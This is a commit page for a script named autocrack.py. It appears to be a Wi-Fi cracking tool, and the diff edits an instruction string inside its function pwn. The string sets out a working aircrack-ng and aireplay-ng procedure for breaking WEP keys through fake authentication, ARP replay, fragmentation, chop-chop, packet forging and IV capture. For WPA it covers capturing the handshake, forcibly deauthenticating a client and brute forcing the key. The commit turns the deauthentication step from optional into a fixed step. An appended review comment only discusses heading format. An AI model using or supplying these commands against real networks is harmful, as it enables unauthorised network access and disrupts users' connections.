author | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-12-05 23:29:20 -0500 |
---|---|---|
committer | Jason A. Donenfeld <Jason@zx2c4.com> | 2011-12-05 23:29:20 -0500 |
commit | c0a85caf1435636639efb98f3a63fd3e74e0ac5e (patch) | |
tree | 5e0791283697378b5ab0621e20aeb0a8a5914aec /autocrack.py | |
parent | Add WPA brute forcing. (diff) | |
Improve instructions.
Diffstat (limited to 'autocrack.py')
-rwxr-xr-x | autocrack.py | 14 |
1 files changed, 8 insertions, 6 deletions
diff --git a/autocrack.py b/autocrack.py
index 4ea9706..0c8c0f0 100755
--- a/autocrack.py
+++ b/autocrack.py
@@ -63,18 +63,23 @@ def pwn(interface, network):
 if network["Encryption"].startswith("WEP"):
 instructions = """
+=== Capture IVs ==
+airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE
+
 == Get Deauthetication Packets (Fake Authentication) ==
 aireplay-ng -1 0 -e 'NAME' -a BSSID -h MAC INTERFACE
 OR
 aireplay-ng -1 6000 -o 1 -q 10 -e 'NAME' -a BSSID -h MAC INTERFACE
+* the latter is good for persnikitty stations
 
 == Request ARP Packets ==
 aireplay-ng -3 -b BSSID -h MAC INTERFACE
-* if successful move to capture IVs
+* if successful, skip the next three steps and move to analyze
 
 == Fragmentation Attack (if requesting ARPs didn't work - no users on network) ==
 aireplay-ng -5 -b BSSID -h MAC INTERFACE
 * use this packet? yes
+* if successful, skip the next step and construct an arp packet
 
 == Chop-Chop Attach (if fragmentation fails) ==
 aireplay-ng -4 -b BSSID -h MAC INTERFACE
@@ -84,10 +89,7 @@ aireplay-ng -4 -b BSSID -h MAC INTERFACE
 packetforge-ng -0 -a BSSID -h MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-request
 * k source, l destination - change for persnikittiness
 
-== Capture IVs ==
-airodump-ng -c CHANNEL --bssid BSSID -w output INTERFACE
-
-== Inject Constructed ARP (if fragmentation or chop-chop) ==
+= Inject Constructed ARP (if fragmentation or chop-chop) ==
 aireplay-ng -2 -r arp-request INTERFACE
 * use this packet? yes
 
@@ -99,7 +101,7 @@ aircrack-ng -z -b BSSID output*.cap
 == Collect 4-way Authentication Handshake ==
 airodump-ng -c CHANNEL --bssid BSSID -w psk INTERFACE
 
-== Deauthenticate Wireless Client (optional) ==
+== Deauthenticate Wireless Client ==
 aireplay-ng -0 1 -a BSSID -c CLIENT wlan0
 
 == Brute Force == |
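Review bot: The two headings this commit touches no longer match the `== Title ==` form used by every other section of the string: the added line in the first hunk reads `=== Capture IVs ==`, and the replacement in the second hunk reads `= Inject Constructed ARP (if fragmentation or chop-chop) ==`. Both look like editing slips; `== Capture IVs ==` and `== Inject Constructed ARP (if fragmentation or chop-chop) ==` would keep the printed text uniform. The added hints that count sections (`skip the next three steps`, `skip the next step`) depend on section order, and the lines between the first two hunks are not visible here, so the counts cannot be confirmed from this page; naming the target heading instead of a count would survive later reordering. The string belongs to `pwn`, whose body starts and ends outside these hunks.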